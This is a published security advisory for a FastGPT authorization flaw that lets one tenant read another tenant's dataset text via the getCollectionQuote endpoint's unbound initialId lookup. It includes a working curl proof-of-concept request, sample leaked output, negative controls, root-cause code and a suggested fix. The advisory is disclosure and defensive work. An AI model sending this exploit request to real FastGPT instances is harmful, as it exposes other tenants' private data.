Skip to content

FastGPT: /api/core/chat/record/getCollectionQuote can disclose cross-tenant dataset text due to an unbound initialId lookup

High
c121914yu published GHSA-mmg6-2g54-j896 Jul 1, 2026

Package

FastGPT (labring)

Affected versions

4.14.17~4.14.23

Patched versions

4.15.0-beta5

Description

Summary

I reproduced a cross-tenant data disclosure issue in FastGPT v4.14.17, v4.14.22, and v4.14.23.

The endpoint POST /api/core/chat/record/getCollectionQuote authenticates the caller's chat and collection context, but the initialId center-node lookup is not bound to that authorized context. A low-privileged tenant user can call the endpoint with their own valid appId, chatId, chatItemDataId, and collectionId, while supplying another tenant's dataset data id as initialId. The response includes the foreign dataset text.

An attacker-owned public outLink can also be used as an amplification path when the attacker enables full quote display for their own app. The core vulnerability is the authenticated cross-tenant disclosure; the public outLink path is not required for the primary finding.

Impact

An authenticated tenant user can read another tenant's dataset quote/full-text content if they know or obtain a victim dataset data id usable as initialId.

This violates FastGPT's tenant and dataset authorization boundary. The leaked data is RAG dataset text, not only metadata. In the validation runs below, the response returned the victim marker and full text from tenant A while the request used tenant B's authorized chat and collection context.

Security Boundary

The intended boundary is that a chat quote endpoint should only return dataset data that belongs to the authorized chat, collection, dataset, and team context.

The vulnerable request crosses that boundary because the caller's authorized B collection context is accepted, but the returned center node can belong to tenant A.

Preconditions

  • The attacker has a normal FastGPT tenant account.
  • The attacker can create a normal dataset, app, and chat that includes dataset citations.
  • The attacker knows or obtains a victim datasetDataId that can be used as initialId.
  • For the optional public outLink amplification, the attacker enables their own app outLink and allows citation/full-text display.

No administrator role is required for the exploit path.

Environment Used

  • Product: FastGPT
  • Tested versions: v4.14.17, v4.14.22, and v4.14.23
  • Target used for validation: self-hosted FastGPT test instances
  • Authentication model used: two normal tenant users, user_a as victim and user_b as attacker

Reproduction Steps

  1. Create two normal tenant users:

    • user_a: victim tenant
    • user_b: attacker tenant
  2. As user_a, create a dataset and insert a text document containing a unique marker.

    Example marker used in one validation run:

    QUOTE_A_20260606181434
    FastGPT quote authorization test text for user_a.
    This line is intentionally unique for quote/full-text verification.
    
  3. As user_b, create a separate dataset and insert a text document containing a different marker.

    Example marker used in one validation run:

    QUOTE_B_20260606181434
    FastGPT quote authorization test text for user_b.
    This line is intentionally unique for quote/full-text verification.
    
  4. As user_b, create an app/chat flow that can retain dataset citations for B's dataset. Confirm that B can normally read B's own quote data.

  5. Capture the following attacker-owned identifiers from B's normal chat context:

    • appId
    • chatId
    • chatItemDataId
    • B-owned collectionId
  6. Capture one victim-owned dataset data id from A's dataset data. This value is used only as the foreign initialId.

Proof of Concept

Setup

The PoC needs:

  • one victim dataset row owned by user_a;
  • one attacker chat/app/collection context owned by user_b;
  • an authenticated session or API request context for user_b.

The attacker-owned values are:

  • APP_ID_B
  • CHAT_ID_B
  • CHAT_ITEM_DATA_ID_B
  • COLLECTION_ID_B

The victim-owned value is:

  • DATA_ID_A

The security boundary is crossed when a request authenticated as user_b uses B-owned context values with A-owned DATA_ID_A as initialId.

Negative Control

Before sending the exploit request, verify the normal deny paths:

  • Anonymous quote endpoint requests without an outLink are rejected.
  • getQuote with B's collection and A's data id does not return A's marker.
  • getQuoteData with B's chat and A's data id is rejected.
  • B collection source read/export against A's collection is rejected.

These checks are important because they show the issue is not a broad direct IDOR across all quote or collection APIs.

Exploit Action

Replace the placeholder values with ids from the reviewer environment. The important part is that APP_ID_B, CHAT_ID_B, CHAT_ITEM_DATA_ID_B, and COLLECTION_ID_B all belong to tenant B, while DATA_ID_A belongs to tenant A.

BASE_URL="https://<fastgpt-host>"
B_AUTH_COOKIE="<user_b_cookie_or_session_header_value>"

APP_ID_B="<attacker_app_id>"
CHAT_ID_B="<attacker_chat_id>"
CHAT_ITEM_DATA_ID_B="<attacker_chat_item_data_id>"
COLLECTION_ID_B="<attacker_collection_id>"
DATA_ID_A="<victim_dataset_data_id>"

curl -i "${BASE_URL}/api/core/chat/record/getCollectionQuote" \
  -H "Content-Type: application/json" \
  -H "Cookie: ${B_AUTH_COOKIE}" \
  --data-binary @- <<EOF
{
  "appId": "${APP_ID_B}",
  "chatId": "${CHAT_ID_B}",
  "chatItemDataId": "${CHAT_ITEM_DATA_ID_B}",
  "collectionId": "${COLLECTION_ID_B}",
  "initialId": "${DATA_ID_A}",
  "anchor": 0,
  "pageSize": 5
}
EOF

If the target uses a bearer token or another authorization header instead of a cookie, keep the same JSON body and replace the Cookie header with the appropriate authenticated user_b header.

Illustrative values from one validation run:

APP_ID_B="6a23f314df88ac798f2584d1"
CHAT_ID_B="quote-b-chat-20260606181434"
CHAT_ITEM_DATA_ID_B="quote-b-ai-20260606181434"
COLLECTION_ID_B="6a23f30edf88ac798f258464"
DATA_ID_A="6a23f3106143501cb8fe7d82"

Verification

The vulnerable behavior is present when the response is HTTP 200 / JSON code: 200 and the data.list array contains the victim marker or equivalent victim dataset text.

In one validation run, the response contained tenant A's marker QUOTE_A_20260606181434:

{
  "code": 200,
  "data": {
    "hasMoreNext": false,
    "hasMorePrev": false,
    "list": [
      {
        "_id": "6a23f3106143501cb8fe7d82",
        "id": "6a23f3106143501cb8fe7d82",
        "index": 0,
        "anchor": 0,
        "q": "QUOTE_A_20260606181434\nFastGPT quote authorization test text for user_a.\nThis line is intentionally unique for quote/full-text verification.",
        "history": [],
        "updateTime": "2026-06-06T10:14:40.414Z"
      },
      {
        "_id": "6a23f310df88ac798f258481",
        "id": "6a23f310df88ac798f258481",
        "index": 0,
        "anchor": 0,
        "q": "QUOTE_B_20260606181434\nFastGPT quote authorization test text for user_b.\nThis line is intentionally unique for quote/full-text verification.",
        "history": [],
        "updateTime": "2026-06-06T10:14:40.295Z"
      }
    ]
  },
  "message": "",
  "statusText": ""
}

Expected vs Actual

Expected: the server rejects the request, or it returns only dataset rows that match the authorized B teamId, datasetId, and collectionId context.

Actual: the request returns HTTP 200 / JSON code: 200, and data.list can include tenant A's dataset text even though the request is authenticated through tenant B's chat and collection context.

Version Matrix

I repeated the same A/B tenant validation flow on the following self-hosted test instances. Each run used harmless marker strings, an attacker-owned B appId/chatId/chatItemDataId/collectionId, and a victim-owned A dataset data id supplied as initialId.

In the table, "negative controls passed" means the expected deny paths remained closed: anonymous no-outLink requests failed, getQuote and getQuoteData did not return A's marker from B's context, and B's collection read/export requests against A's collection failed.

Version Container image tested Authenticated B context + A initialId Public outLink amplifier Negative controls Result Representative victim marker
v4.14.17 ghcr.io/labring/fastgpt:v4.14.17 HTTP 200 / JSON code: 200; response included tenant A text HTTP 200 / JSON code: 200; response included tenant A text when B enabled full quote display Passed Vulnerable QUOTE_A_20260606210044
v4.14.22 ghcr.io/labring/fastgpt:v4.14.22 HTTP 200 / JSON code: 200; response included tenant A text HTTP 200 / JSON code: 200; response included tenant A text when B enabled full quote display Passed Vulnerable QUOTE_A_20260606194729
v4.14.23 ghcr.io/labring/fastgpt:v4.14.23 HTTP 200 / JSON code: 200; response included tenant A text HTTP 200 / JSON code: 200; response included tenant A text when B enabled full quote display Passed Vulnerable QUOTE_A_20260606201216

I did not observe a fixed version in this version matrix. Intermediate or later versions should be confirmed by the maintainer before publishing a broader affected-version range.

Negative Controls

I also checked sibling and expected-deny paths to separate this from a broad direct IDOR issue:

  • A can read A's own quote data, and B can read B's own quote data.
  • Anonymous requests to quote endpoints without an outLink are rejected. In the primary validation run, anonymous getCollectionQuote without outLink returned HTTP 403 / JSON code 403.
  • getQuote with B's collection and A's data id returned HTTP 200 / JSON code 200, but did not return A's marker.
  • getQuote with A's collection under B's chat was rejected with HTTP 500 / JSON code 501007.
  • getQuoteData with B's chat and A's data id was rejected with HTTP 500 / JSON code 501007.
  • B collection source read/export against A's collection failed. In the primary validation run, collection read returned HTTP 500 / JSON code 501007, and collection export returned HTTP 500 / JSON code 501004.

These controls indicate that the issue is specific to the getCollectionQuote initialId center-node path, not a general failure of the surrounding quote/data APIs.

Public OutLink Amplification

If tenant B enables B's own app playground/public outLink and allows full quote/citation display, an unauthenticated caller can use the public outLink context with the same foreign initialId pattern.

In the validation runs, B's public outLink request returned HTTP 200 / JSON code: 200 and included tenant A's marker in the getCollectionQuote response. Representative victim markers are listed in the version matrix.

This does not change the core root cause. The attacker still needs a valid attacker-owned outLink context and a victim initialId. I include this as an impact amplifier because it can shift the final disclosure step from authenticated B to a public outLink once B publishes their own app with permissive quote display flags.

Root Cause

In getCollectionQuote.ts, the endpoint builds an authorization-bound query context, baseMatch, from the authenticated collection. That context includes the authorized teamId, datasetId, and collectionId.

However, the initial center-node path fetches the requested row only by _id:

const centerNode = await MongoDatasetData.findOne(
  {
    _id: new Types.ObjectId(initialId)
  },
  quoteDataFieldSelector
).lean();

Because this lookup does not include baseMatch, a center node from another tenant or collection can be returned. The returned center node is then merged into the response list.

By contrast, the sibling paths I tested bind the requested data to an authorized collection:

  • getQuote uses collection authorization and queries by both dataset data ids and authorized collection ids.
  • getQuoteData resolves the data row's collection and checks that collection in the chat context before returning content.

Old-CVE Separation

This report is not based on the previously known team/init or v1/v2 chat team-token issue.

I am not using:

  • team/init
  • v1/v2 chat team-token paths
  • an app.teamId === teamId missing-check primitive
  • any historical team-token primitive

The closest historical advisory I am aware of is CVE-2026-40252 / GHSA-gc8m-w37w-24hw. This report should be treated separately because the new issue is inside /api/core/chat/record/getCollectionQuote: the endpoint authorizes the surrounding chat/collection context, but the internal initialId object lookup is not bound to the authorized teamId, datasetId, and collectionId.

CVSS

Researcher-preferred score under a tenant-boundary interpretation:

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Score: 7.4 High

Rationale:

  • AV:N: the vulnerable endpoint is reachable over HTTP.
  • AC:L: exploitation is a normal API request once the attacker has their own chat/collection context and a victim data id.
  • PR:L: the core exploit requires a normal authenticated tenant account.
  • UI:N: no victim interaction is required for the authenticated B-to-A disclosure.
  • S:C: the request crosses a tenant/workspace data boundary.
  • C:H: the response can include another tenant's dataset full text.
  • I:N/A:N: I am not claiming integrity or availability impact for this finding.

Suggested Fix

  • In handleInitialLoad(), bind the center-node lookup to the authorized context, for example by querying with baseMatch and _id together:

    const centerNode = await MongoDatasetData.findOne(
      {
        ...baseMatch,
        _id: new Types.ObjectId(initialId)
      },
      quoteDataFieldSelector
    ).lean();
  • If the center node does not match the authorized team/dataset/collection context, reject the request or return no foreign node.

  • Consider binding initialId, prevId, and nextId to the chat item's actual citation list, rather than trusting a caller-supplied collectionId plus arbitrary dataset data ids.

  • Add regression tests for:

    • A reading A's own quote.
    • B reading B's own quote.
    • B using B collectionId with A initialId.
    • Public outLink with showFullText and citation flags enabled/disabled.
    • getQuote and getQuoteData sibling negative controls.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE ID

CVE-2026-61644

Weaknesses

Incorrect Authorization

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. Learn more on MITRE.

Credits